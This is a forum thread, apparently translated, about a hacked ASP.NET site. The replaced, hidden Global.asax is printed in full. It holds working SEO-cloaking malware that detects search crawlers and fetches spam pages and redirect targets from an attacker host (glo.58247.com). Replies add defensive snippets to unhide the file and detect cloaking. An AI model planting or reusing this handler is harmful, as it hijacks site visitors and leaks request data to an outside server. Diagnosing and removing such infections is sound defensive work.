Has anyone run into this problem with ASP.NET? The Global.asax file was replaced with the code below, and the file was even hidden.
<%@ Application Language="C#" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
// Injected handler: runs on every request and splits traffic into a
// "search-engine crawler" branch and an "ordinary visitor" branch (SEO cloaking).
void Application_BeginRequest(object sender, EventArgs e)
{
    // Crawler detection by User-Agent substring.
    string[] spidersString = "spider,msnbot,Baiduspider,YodaoBot,Googlebot".ToLower().Split(',');
    bool spi = false;
    string user = Request.ServerVariables["HTTP_USER_AGENT"].ToString().ToLower();
    foreach (string s1 in spidersString)
    {
        if (user.Contains(s1))
        {
            spi = true;
            break;
        }
    }
    if (spi == false)
    {
        // Ordinary visitor: if they arrived from Baidu or Google search results,
        // download a redirect target from the attacker's server and send them there.
        if (Request.UrlReferrer != null && (Request.UrlReferrer.ToString().ToLower().Contains("baidu") || Request.UrlReferrer.ToString().ToLower().Contains("google")))
        {
            string sl = "http://glo.58247.com/txt/tiao.txt";
            WebClient SWebClient = new WebClient();
            SWebClient.Headers.Add("User-Agent", sl);
            SWebClient.Credentials = CredentialCache.DefaultCredentials;
            byte[] paged = SWebClient.DownloadData(sl);
            string r = Encoding.Default.GetString(paged);
            string strHost = Request.ServerVariables["HTTP_HOST"];
            Response.Redirect(r + strHost);
            Response.End();
        }
    }
    else
    {
        // Crawler: download a spam-generator URL from the attacker's server, pass
        // along host, path, User-Agent, referrer and query string, then serve the
        // returned spam page to the crawler instead of the real site content.
        Response.Clear();
        string durl = "http://glo.58247.com/txt/glourl.txt";
        WebClient URLWebClient = new WebClient();
        URLWebClient.Headers.Add("User-Agent", durl);
        URLWebClient.Credentials = CredentialCache.DefaultCredentials;
        byte[] page = URLWebClient.DownloadData(durl);
        string SERL = Encoding.Default.GetString(page);
        string strHost = Request.ServerVariables["HTTP_HOST"];
        string strSelfPage = Request.ServerVariables["PATH_INFO"];
        string strUA = Request.ServerVariables["HTTP_USER_AGENT"];
        string strQS = Request.ServerVariables["QUERY_STRING"];
        string strReferer = Request.ServerVariables["HTTP_REFERER"];
        Random r = new Random();
        int i = r.Next();
        string surl = SERL + "?domain=" + strHost + "&ua=" + Server.UrlEncode(strUA) + "&frompage=" + Server.UrlEncode(strReferer) + "&file=" + strSelfPage + "&" + strQS + "&" + i;
        WebClient myWebClient = new WebClient();
        myWebClient.Credentials = CredentialCache.DefaultCredentials;
        byte[] pagedata = myWebClient.DownloadData(surl);
        string result = Encoding.Default.GetString(pagedata);
        // result = result.Replace("<a href=", "<a href=?");
        Response.Write(result);
        Response.End();
    }
}
</script>
Clicking Global.asax inside the project just shows you this. If you're curious, open the folder where the project lives on disk and open Global.asax with Notepad; then you'll see what is going on.
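In case it helps, here is a minimal console sketch (the site-root path is a placeholder, not from the question) that locates Global.asax on disk, clears the Hidden attribute if the attacker set it, and prints the file so the injected handler becomes visible:

using System;
using System.IO;

class CheckGlobalAsax
{
    static void Main()
    {
        string siteRoot = @"C:\inetpub\wwwroot\yoursite";   // placeholder: your own web root
        string path = Path.Combine(siteRoot, "Global.asax");

        if (!File.Exists(path))
        {
            Console.WriteLine("Global.asax not found under " + siteRoot);
            return;
        }

        // If the file was marked hidden, clear the attribute so Explorer
        // and the IDE can see it again.
        FileAttributes attrs = File.GetAttributes(path);
        if ((attrs & FileAttributes.Hidden) == FileAttributes.Hidden)
        {
            Console.WriteLine("Global.asax is marked hidden; clearing the attribute.");
            File.SetAttributes(path, attrs & ~FileAttributes.Hidden);
        }

        // Dump the file so the injected Application_BeginRequest handler is visible.
        Console.WriteLine(File.ReadAllText(path));
    }
}

You may need to run it with an account that has read/write access to the web root.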
string[] spidersString = "spider,msnbot,Baiduspider,YodaoBot,Googlebot".ToLower().Split(',');
The moment you see this line, you know your site has been hacked; the injected code even singles out search-engine spiders.
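One way to confirm this kind of cloaking from the outside is to request the same page once with a normal browser User-Agent and once with a crawler User-Agent and compare the responses. A minimal sketch; the URL is a placeholder for your own site:

using System;
using System.Net;
using System.Text;

class CloakingCheck
{
    static string Fetch(string url, string userAgent)
    {
        using (var client = new WebClient())
        {
            client.Headers.Add("User-Agent", userAgent);
            byte[] data = client.DownloadData(url);
            return Encoding.UTF8.GetString(data);
        }
    }

    static void Main()
    {
        string url = "http://www.example.com/";   // placeholder: your own site

        string asBrowser = Fetch(url, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
        string asSpider  = Fetch(url, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");

        // With the injected handler above, the spider branch serves spam fetched
        // from the attacker's server, so the two bodies differ noticeably.
        Console.WriteLine("Browser response length: " + asBrowser.Length);
        Console.WriteLine("Spider response length:  " + asSpider.Length);
        Console.WriteLine(asBrowser == asSpider
            ? "Responses match; no obvious cloaking."
            : "Responses differ; the site is serving different content to crawlers.");
    }
}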
Haven't seen this before.